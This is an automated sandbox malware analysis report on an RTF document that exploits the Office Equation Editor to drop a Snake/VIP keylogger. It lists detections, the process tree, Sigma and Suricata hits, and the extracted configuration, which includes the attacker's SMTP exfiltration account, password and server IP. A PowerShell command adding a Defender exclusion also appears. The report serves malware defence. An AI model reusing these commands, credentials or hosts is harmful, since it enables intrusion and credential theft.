Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
na.doc

Overview

General Information

Sample name:na.doc
Analysis ID:1545179
MD5:84db82889d53879931a4551c5c81619b
SHA1:29d3908cadf8833d5dfe8f46235fc332f16883af
SHA256:3a3a4165f6e4845d27dcee1345e65abc27af1fbd2a9acb2e675faa02dd3dbe5f
Tags:docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3228 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3308 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • cmnjgyugo61000.exe (PID: 3472 cmdline: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe" MD5: 53A7577C1DE37E54A78A2B918EB0D8BB)
        • powershell.exe (PID: 3560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • cmnjgyugo61000.exe (PID: 3576 cmdline: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe" MD5: 53A7577C1DE37E54A78A2B918EB0D8BB)
    • EQNEDT32.EXE (PID: 3800 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "yugolog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "yugolog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
na.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x5b463:$obj2: \objdata
  • 0x5b477:$obj3: \objupdate
  • 0x5b43f:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.cmnjgyugo61000.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            8.2.cmnjgyugo61000.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              8.2.cmnjgyugo61000.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                8.2.cmnjgyugo61000.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  8.2.cmnjgyugo61000.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2dca0:$a1: get_encryptedPassword
                  • 0x2e228:$a2: get_encryptedUsername
                  • 0x2d913:$a3: get_timePasswordChanged
                  • 0x2da2a:$a4: get_passwordField
                  • 0x2dcb6:$a5: set_encryptedPassword
                  • 0x309d2:$a6: get_passwords
                  • 0x30d66:$a7: get_logins
                  • 0x309be:$a8: GetOutlookPasswords
                  • 0x30377:$a9: StartKeylogger
                  • 0x30cbf:$a10: KeyLoggerEventArgs
                  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 27 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 87.120.84.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3308, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3308, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\CLLPdgxhnmwGf5Y[1].exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3308, Protocol: tcp, SourceIp: 87.120.84.38, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", ParentImage: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, ParentProcessId: 3472, ParentProcessName: cmnjgyugo61000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", ProcessId: 3560, ProcessName: powershell.exe
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, NewProcessName: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3308, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", ProcessId: 3472, ProcessName: cmnjgyugo61000.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, NewProcessName: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3308, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", ProcessId: 3472, ProcessName: cmnjgyugo61000.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", ParentImage: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, ParentProcessId: 3472, ParentProcessName: cmnjgyugo61000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", ProcessId: 3560, ProcessName: powershell.exe
                  Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, QueryName: checkip.dyndns.org
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3308, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", ParentImage: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe, ParentProcessId: 3472, ParentProcessName: cmnjgyugo61000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe", ProcessId: 3560, ProcessName: powershell.exe
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3228, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3560, TargetFilename: C:\Users\user\AppData\Local\Temp\xxoncosu.mah.ps1

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:14:18.649430+010020220501A Network Trojan was detected87.120.84.3880192.168.2.2249165TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:14:18.981830+010020220511A Network Trojan was detected87.120.84.3880192.168.2.2249165TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:14:18.981830+010028274491Attempted User Privilege Gain87.120.84.3880192.168.2.2249165TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:14:30.554577+010028033053Unknown Traffic192.168.2.2249168188.114.96.3443TCP
                  2024-10-30T08:14:36.699659+010028033053Unknown Traffic192.168.2.2249174188.114.97.3443TCP
                  2024-10-30T08:14:40.091187+010028033053Unknown Traffic192.168.2.2249178188.114.97.3443TCP
                  2024-10-30T08:14:44.496057+010028033053Unknown Traffic192.168.2.2249182188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:14:28.807025+010028032742Potentially Bad Traffic192.168.2.2249166158.101.44.24280TCP
                  2024-10-30T08:14:29.981164+010028032742Potentially Bad Traffic192.168.2.2249166158.101.44.24280TCP
                  2024-10-30T08:14:32.586408+010028032742Potentially Bad Traffic192.168.2.2249169193.122.6.16880TCP
                  2024-10-30T08:14:34.270927+010028032742Potentially Bad Traffic192.168.2.2249171193.122.6.16880TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: na.docAvira: detected
                  Found malware configuration
                  Source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "yugolog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "yugolog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587"}
                  Multi AV Scanner detection for submitted file
                  Source: na.docReversingLabs: Detection: 44%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\CLLPdgxhnmwGf5Y[1].exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 87.120.84.38 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49183 version: TLS 1.2

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 005F4EB5h5_2_005F4973
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_001D69B8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001D9743h8_2_001D9330
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001D767Dh8_2_001D7490
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001D8007h8_2_001D7490
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001D9181h8_2_001D8EC4
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001DEB89h8_2_001DE8A8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001DF4B9h8_2_001DF1D9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_001D71C9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001DFDE9h8_2_001DFB08
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001DF021h8_2_001DED40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001D9743h8_2_001D95B0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001DF951h8_2_001DF670
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 001D9743h8_2_001D9672
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_001D6FEA
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FE54Ah8_2_003FE250
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F85AAh8_2_003F82B0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F1A09h8_2_003F1738
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FFD32h8_2_003FFA38
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F3101h8_2_003F2E30
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FD22Ah8_2_003FCF30
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FA722h8_2_003FA428
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F50E9h8_2_003F4E18
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FEA12h8_2_003FE718
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F67E2h8_2_003F6510
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FBF0Ah8_2_003FBC10
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F10D9h8_2_003F0E08
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F7F7Ah8_2_003F7C08
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F9402h8_2_003F9108
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F27D1h8_2_003F2500
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F6349h8_2_003F6078
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F8A72h8_2_003F8778
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F0C41h8_2_003F0970
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F7A41h8_2_003F7770
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FF86Ah8_2_003FF570
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F2339h8_2_003F2068
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FCD62h8_2_003FCA68
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F3A09h8_2_003F3760
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FA25Ah8_2_003F9F60
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F4321h8_2_003F4050
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F5A19h8_2_003F5748
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FBA42h8_2_003FB748
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F0311h8_2_003F0040
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F7111h8_2_003F6E40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F8F3Ah8_2_003F8C40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F3E89h8_2_003F3BB8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FB0B2h8_2_003FADB8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F5581h8_2_003F52B0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F6C79h8_2_003F69A8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FF3A2h8_2_003FF0A8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F1571h8_2_003F12A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FC89Ah8_2_003FC5A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F2C69h8_2_003F2998
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F9D92h8_2_003F9A98
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FE082h8_2_003FDD88
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F4C51h8_2_003F4980
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FB57Ah8_2_003FB280
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FD6F2h8_2_003FD3F8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FABEAh8_2_003FA8F0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F47B9h8_2_003F44E8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F5EB1h8_2_003F5BE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FEEDAh8_2_003FEBE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F07A9h8_2_003F04D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003F75A9h8_2_003F72D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 4x nop then jmp 003FC3D2h8_2_003FC0D8
